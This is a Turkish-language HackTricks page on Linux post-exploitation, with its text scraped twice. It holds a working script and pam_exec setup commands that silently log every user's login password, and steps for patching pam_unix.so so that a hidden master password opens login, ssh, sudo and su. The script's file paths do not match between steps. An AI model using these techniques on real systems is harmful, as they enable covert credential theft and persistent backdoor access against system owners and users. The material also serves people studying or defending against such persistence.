Linux Post-Exploitation

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PAM ile Giriş Parolalarını Dinleme

Her kullanıcının giriş yapmak için kullandığı parolayı kaydetmek için bir PAM modülü yapılandıralım. PAM'ın ne olduğunu bilmiyorsanız kontrol edin:

Daha fazla detay için orijinal gönderiyi kontrol edin. Bu sadece bir özet:

Teknik Genel Bakış: Eklentili Kimlik Doğrulama Modülleri (PAM), Unix tabanlı sistemlerde kimlik doğrulama yönetiminde esneklik sunar. Giriş süreçlerini özelleştirerek güvenliği artırabilir, ancak kötüye kullanıldığında riskler de oluşturabilir. Bu özet, PAM kullanarak giriş kimlik bilgilerini yakalamak için bir tekniği ve azaltma stratejilerini özetlemektedir.

Kimlik Bilgilerini Yakalama:

toomanysecrets.sh adlı bir bash betiği, giriş denemelerini kaydetmek için oluşturulmuştur; tarih, kullanıcı adı ($PAM_USER), parola (stdin üzerinden) ve uzak ana bilgisayar IP'si ($PAM_RHOST) /var/log/toomanysecrets.log dosyasına kaydedilir.
Betik çalıştırılabilir hale getirilir ve pam_exec.so modülü kullanılarak PAM yapılandırmasına (common-auth) entegre edilir; bu, sessizce çalıştırma ve kimlik doğrulama belirtecini betiğe açma seçenekleri ile yapılır.
Bu yaklaşım, ele geçirilmiş bir Linux ana bilgisayarının kimlik bilgilerini gizlice kaydetmek için nasıl istismar edilebileceğini göstermektedir.

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh

PAM'ı Arka Kapı ile Değiştirme

Daha fazla detay için orijinal yazıya bakın. Bu sadece bir özet:

Eklentili Kimlik Doğrulama Modülü (PAM), Linux altında kullanıcı kimlik doğrulaması için kullanılan bir sistemdir. Üç ana kavram üzerinde çalışır: kullanıcı adı, şifre ve hizmet. Her hizmet için yapılandırma dosyaları /etc/pam.d/ dizininde bulunur; burada paylaşılan kütüphaneler kimlik doğrulamasını yönetir.

Amaç: PAM'ı, belirli bir şifre ile kimlik doğrulamasına izin verecek şekilde değiştirmek, gerçek kullanıcı şifresini atlayarak. Bu, neredeyse tüm hizmetler tarafından şifre doğrulaması için kullanılan common-auth dosyasında yer alan pam_unix.so paylaşılan kütüphanesine özellikle odaklanmaktadır.

`pam_unix.so`'yu Değiştirme Adımları:

common-auth dosyasında Kimlik Doğrulama Yönergesini Bulun:

Bir kullanıcının şifresini kontrol eden satır pam_unix.so'yu çağırır.

Kaynak Kodunu Değiştirin:

pam_unix_auth.c kaynak dosyasına, önceden tanımlanmış bir şifre kullanıldığında erişim izni veren bir koşullu ifade ekleyin, aksi takdirde normal kimlik doğrulama sürecine devam edin.

Derleyin ve Değiştirilmiş pam_unix.so kütüphanesini uygun dizinde değiştirin.
Test:

Önceden tanımlanmış şifre ile çeşitli hizmetlere (giriş, ssh, sudo, su, ekran koruyucu) erişim izni verilirken, normal kimlik doğrulama süreçleri etkilenmez.

Bu süreci https://github.com/zephrax/linux-pam-backdoor ile otomatikleştirebilirsiniz.

HackTricks'i Destekleyin

abonelik planlarına göz atın!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousLinux Environment Variables NextPAM - Pluggable Authentication Modules

Last updated 3 days ago

PAM ile Giriş Parolalarını Dinleme

Her kullanıcının giriş yapmak için kullandığı parolayı kaydetmek için bir PAM modülü yapılandıralım. PAM'ın ne olduğunu bilmiyorsanız kontrol edin:

Daha fazla detay için orijinal gönderiyi kontrol edin. Bu sadece bir özet:

Kimlik Bilgilerini Yakalama:

toomanysecrets.sh adlı bir bash betiği, giriş denemelerini kaydetmek için oluşturulmuştur; tarih, kullanıcı adı ($PAM_USER), parola (stdin üzerinden) ve uzak ana bilgisayar IP'si ($PAM_RHOST) /var/log/toomanysecrets.log dosyasına kaydedilir.

Betik çalıştırılabilir hale getirilir ve pam_exec.so modülü kullanılarak PAM yapılandırmasına (common-auth) entegre edilir; bu, sessizce çalıştırma ve kimlik doğrulama belirtecini betiğe açma seçenekleri ile yapılır.

Bu yaklaşım, ele geçirilmiş bir Linux ana bilgisayarının kimlik bilgilerini gizlice kaydetmek için nasıl istismar edilebileceğini göstermektedir.

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh

PAM'ı Arka Kapı ile Değiştirme

Daha fazla detay için orijinal yazıya bakın. Bu sadece bir özet:

pam_unix.so'yu Değiştirme Adımları:

common-auth dosyasında Kimlik Doğrulama Yönergesini Bulun:

Bir kullanıcının şifresini kontrol eden satır pam_unix.so'yu çağırır.

Kaynak Kodunu Değiştirin:

pam_unix_auth.c kaynak dosyasına, önceden tanımlanmış bir şifre kullanıldığında erişim izni veren bir koşullu ifade ekleyin, aksi takdirde normal kimlik doğrulama sürecine devam edin.

Derleyin ve Değiştirilmiş pam_unix.so kütüphanesini uygun dizinde değiştirin.

Test:

Önceden tanımlanmış şifre ile çeşitli hizmetlere (giriş, ssh, sudo, su, ekran koruyucu) erişim izni verilirken, normal kimlik doğrulama süreçleri etkilenmez.

PAM ile Giriş Parolalarını Dinleme

PAM'ı Arka Kapı ile Değiştirme

pam_unix.so'yu Değiştirme Adımları:

PAM ile Giriş Parolalarını Dinleme

PAM'ı Arka Kapı ile Değiştirme

pam_unix.so'yu Değiştirme Adımları:

`pam_unix.so`'yu Değiştirme Adımları:

`pam_unix.so`'yu Değiştirme Adımları: